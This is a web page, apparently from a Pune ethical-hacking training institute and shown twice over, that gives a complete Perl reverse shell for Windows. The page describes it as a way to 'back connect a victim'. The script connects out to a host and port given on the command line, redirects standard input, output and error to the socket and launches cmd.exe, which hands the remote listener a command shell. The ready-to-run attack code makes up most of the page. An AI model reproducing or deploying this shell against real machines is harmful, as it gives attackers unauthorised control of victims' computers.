Filename | A simple program in perl for back connecting to windows machine |
Permission | rw-r--r-- |
Author | Unknown |
Date and Time | 6/18/2013 |
Label | Penetration |
Action |
Ethical Hacking Institute in Pune
./Arizona Team
Hello friends welcome back to programing zone of Arizona. Today we are going to see how to back connect a victim if he is using windows machine.
In the CEH class I have already shown how to code your own batch and python codes. Today we will see the same stuff but using perl programing.
Go through the logical flow of the code and create your own perl program for back connecting to victim machine. If any difficulty you can write to me at instructor@arizonainfotech.com
Here is the Code:
#!/usr/bin/perl
use IO::Socket;
$system = 'cmd';
$ARGC=@ARGV;
print "\n--== Arizona Back Connect shell for Windows ==-- \n\n";
print "\n--==H0Me : www.arizonainfotech.com ==--\n\n";
if ($ARGC!=2) {
print "Us4g3: $0 [Host] [Port] \n\n";
die "Ex3mpl3: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[+] Resolving HostName\n";
print "[+] Connecting... $ARGV[0] \n";
print "[+] Spawning Shell \n";
print "[+] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "\n--== Arizona Back Connect shell for Windows ==-- \n\n";
print "\n--==H0Me : www.arizonainfotech.com ==--\n\n";
system($system);
#tchaw
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE
./Arizona Team
Hello friends welcome back to programing zone of Arizona. Today we are going to see how to back connect a victim if he is using windows machine.
In the CEH class I have already shown how to code your own batch and python codes. Today we will see the same stuff but using perl programing.
Go through the logical flow of the code and create your own perl program for back connecting to victim machine. If any difficulty you can write to me at instructor@arizonainfotech.com
Here is the Code:
#!/usr/bin/perl
use IO::Socket;
$system = 'cmd';
$ARGC=@ARGV;
print "\n--== Arizona Back Connect shell for Windows ==-- \n\n";
print "\n--==H0Me : www.arizonainfotech.com ==--\n\n";
if ($ARGC!=2) {
print "Us4g3: $0 [Host] [Port] \n\n";
die "Ex3mpl3: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[+] Resolving HostName\n";
print "[+] Connecting... $ARGV[0] \n";
print "[+] Spawning Shell \n";
print "[+] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "\n--== Arizona Back Connect shell for Windows ==-- \n\n";
print "\n--==H0Me : www.arizonainfotech.com ==--\n\n";
system($system);
#tchaw
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE